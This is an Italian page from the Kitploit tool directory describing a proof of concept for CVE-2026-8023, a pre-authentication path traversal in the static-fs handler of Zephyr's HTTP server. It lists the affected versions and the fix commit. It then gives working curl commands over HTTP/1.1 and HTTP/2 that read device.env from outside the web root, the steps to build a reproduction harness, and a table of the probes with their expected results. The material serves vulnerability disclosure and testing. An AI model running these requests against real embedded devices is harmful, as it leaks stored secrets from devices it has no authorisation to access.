Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-8023 — PoC per CVE-2026-8023: Limitazione impropria di un percorso verso una directory ristretta ('Path Traversal') | Kitploit
Strumenti/GitHubGitHub/ret2c/cve-2026-8023
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Web
GitHubret2c/cve-2026-8023

CVE-2026-8023

PoC per CVE-2026-8023: Limitazione impropria di un percorso verso una directory ristretta ('Path Traversal')

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2026-8023 — Path traversal del static-fs HTTP di Zephyr (PoC)

Path traversal pre-autenticazione nel gestore static-fs del server HTTP di Zephyr (subsys/net/lib/http) quando il resource matching wildcard (CONFIG_HTTP_SERVER_RESOURCE_WILDCARD=y) viene usato con HTTP_RESOURCE_TYPE_STATIC_FS. Colpisce sia HTTP/1.1 che HTTP/2.

GHSA: GHSA-hch3-53g6-jj3h

  • Versioni interessate: >= 4.0.0, < 4.3.1; >= 4.4.0, < 4.4.2
  • Confermato su: b93e61d02d5cd08d2fc559feb0253f9de3491777 (v4.4.0-rc1-32-gb93e61d02d5)
  • Introdotto: commit e55278a87be4e5534ba772b23e459882866bcd6d (2024-07-31)
  • Commit di fix: zephyrproject-rtos/zephyr#108531
root@kitploit:~
curl --http1.1 --path-as-is -i "http://$URL/www/../device.env"
curl --http2-prior-knowledge --path-as-is -i "http://$URL/www/../device.env"

Riproduzione

root@kitploit:~
git clone https://github.com/zephyrproject-rtos/zephyr.git
cd zephyr && git checkout b93e61d02d5cd08d2fc559feb0253f9de3491777 && cd ..
west init -l zephyr
west update

# Copy the contents of this repo's pocs/ into zephyr/pocs/
docker build -f zephyr/pocs/Dockerfile.native-sim -t zephyr-httpfs-zdi .
docker run --rm -it -v "$PWD":/work -w /work zephyr-httpfs-zdi bash

# Inside container:
west build -p always -b native_sim/native/64 \
    zephyr/pocs/http_static_fs_native_sim \
    -- -DEXTRA_DTC_OVERLAY_FILE=ramdisk.overlay
./build/zephyr/zephyr.exe

L'harness monta un'immagine LittleFS, scrive un segreto in /littlefs/device.env al di fuori della web root /littlefs/www/, espone una route static-fs wildcard, quindi invia quattro richieste di loopback:

Scarica lo strumento
SondaRichiestaAtteso
HTTP1_GLOB_TRAVERSALGET /www/../device.env (HTTP/1.1)200 + segreto
HTTP1_ENCODED_TRAVERSALGET /www/%2e%2e/device.env (HTTP/1.1)404 (nessuna decodifica)
HTTP2_GLOB_TRAVERSAL:path = /www/../device.env (HTTP/2)byte del segreto
HTTP2_ENCODED_TRAVERSAL:path = /www/%2e%2e/device.env (HTTP/2)nessun segreto